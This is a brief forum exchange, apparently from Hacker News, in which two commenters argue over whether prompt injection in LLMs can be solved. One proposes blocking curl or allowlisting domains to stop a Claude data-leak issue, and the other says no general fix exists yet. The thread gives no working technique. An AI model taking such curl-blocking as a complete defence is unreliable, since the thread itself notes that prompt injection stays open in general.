| ▲ | dvt 6 hours ago | ||||||||||||||||
Everything in an LLM is "evaluated," so I'm not sure where the confusion comes from. We need to be careful when we use `eval()` and we need to be careful when we tell LLMs secrets. The Claude issue above is trivially solved by blocking the use of commands like curl or manually specifiying what domains are allowed (if we're okay with curl). | |||||||||||||||||
| ▲ | stavros 6 hours ago | parent [-] | ||||||||||||||||
The confusion comes from the fact that you're saying "it's easy to solve this particular case" and I'm saying "it's currently impossible to solve prompt injection for every case". Since the original point was about solving all prompt injection vulnerabilities, it doesn't matter if we can solve this particular one, the point is wrong. | |||||||||||||||||
| |||||||||||||||||